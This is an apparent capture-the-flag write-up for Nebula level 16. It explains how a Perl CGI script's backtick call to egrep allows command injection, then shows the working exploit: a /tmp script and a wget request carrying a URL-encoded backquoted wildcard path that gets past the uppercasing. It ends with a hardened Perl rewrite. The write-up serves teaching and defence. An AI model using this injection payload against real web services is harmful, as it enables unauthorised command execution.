Command substitution
Nebula 16 Agenda: “There is a perl script running on port 1616.”

OK, what do we get from the source? Essentially there is one useful query parameter, “username”, which after processing (conversion to uppercase and space stripping) ends up in a line that uses Perl’s command substitution (which works the same way as in the system shell):
@output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;
So what we need to do is create an executable script with an uppercase name and pass the right path to it in the query parameter. Because the whole value is uppercased, a literal /tmp/X would arrive as /TMP/X, so the directory part is given as a shell wildcard instead: /*/X.
level16@nebula:/home/flag16$ cat > /tmp/X
#!/bin/sh
getflag >> /tmp/flag.txt

level16@nebula:/home/flag16$ chmod +x /tmp/X
level16@nebula:/home/flag16$ wget -q http://0.0.0.0:1616/index.cgi?username=%60/*/X%60
level16@nebula:/home/flag16$ cat /tmp/flag.txt
You have successfully executed getflag on a target account
“%60” is the URL-encoded backquote character.
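One way to do the same lookup without handing the value to a shell, as an added example (not the level's own source). The function name lookup_user, the allowlist pattern and the sample database lines are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Hypothetical hardened replacement for the backtick egrep call.
# Returns the database lines that start with the normalised username,
# which is what egrep "^$username" was used for.
sub lookup_user {
    my ($username, $db_path) = @_;

    # Same normalisation the write-up describes: uppercase, cut at whitespace.
    $username = uc $username;
    $username =~ s/\s.*//s;

    # Allowlist (assumed account-name policy): anything containing
    # backquotes, slashes, wildcards, $ or quotes is rejected outright.
    return () unless $username =~ /\A[A-Z0-9_]{1,32}\z/;

    # Read the file in-process with three-argument open; no shell is
    # spawned, so the value is only ever compared as data.
    open(my $fh, '<', $db_path) or die "cannot open $db_path: $!";
    my @hits = grep { index($_, $username) == 0 } <$fh>;
    close $fh;
    return @hits;
}

# Constructed sample database standing in for userdb.txt.
my ($tmp, $path) = tempfile(UNLINK => 1);
print {$tmp} "ALICE:constructed-value\nBOB:constructed-value\n";
close $tmp;

# Constructed inputs: a normal name, the backquoted value from the
# request above, and a name followed by extra text after a space.
for my $input ('alice', '`/*/X`', 'bob extra') {
    my @hits = lookup_user($input, $path);
    printf "%-12s -> %d match(es)\n", $input, scalar @hits;
}
```

If the external egrep has to stay, the list form of open (open(my $fh, '-|', 'egrep', '--', "^$username", $db_path)) also bypasses the shell, though the value should still be validated because it is used as a regular expression.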
Resources: